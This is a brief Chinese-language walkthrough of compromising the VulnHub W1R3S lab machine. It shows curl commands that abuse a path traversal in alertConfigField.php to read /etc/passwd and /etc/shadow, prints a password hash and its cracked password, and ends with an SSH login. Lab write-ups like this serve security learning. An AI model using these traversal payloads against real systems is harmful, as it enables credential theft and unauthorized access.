VulnHub-W1R3S 渗透学习
靶机下载地址:https://www.vulnhub.com/entry/w1r3s-101,220/
kali地址:192.168.31.77
靶机IP地址:192.168.31.11
一、信息收集
使用dirb 爆破目录
curl是一个命令行工具,可用于在网络上传输数据。
它支持许多现成的协议,包括HTTP,HTTPS,FTP,FTPS,SFTP,IMAP,SMTP,POP3等。
在调试网络请求时,curl是您可以找到的最佳工具之一。
curl使用 教程 https://flaviocopes.com/http-curl/
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.31.11/administrator/alerts/alertConfigField.php
然后我再次执行以下命令,使用相同的过程获取密码文件。
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.11/administrator/alerts/alertConfigField.php
将 w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
复制到一个 pass.txt 文本文件中
得到w1r3s 的密码computer
使用 ssh登录
获得flag.txt
获得flag.txt
这个靶机还是比较简单的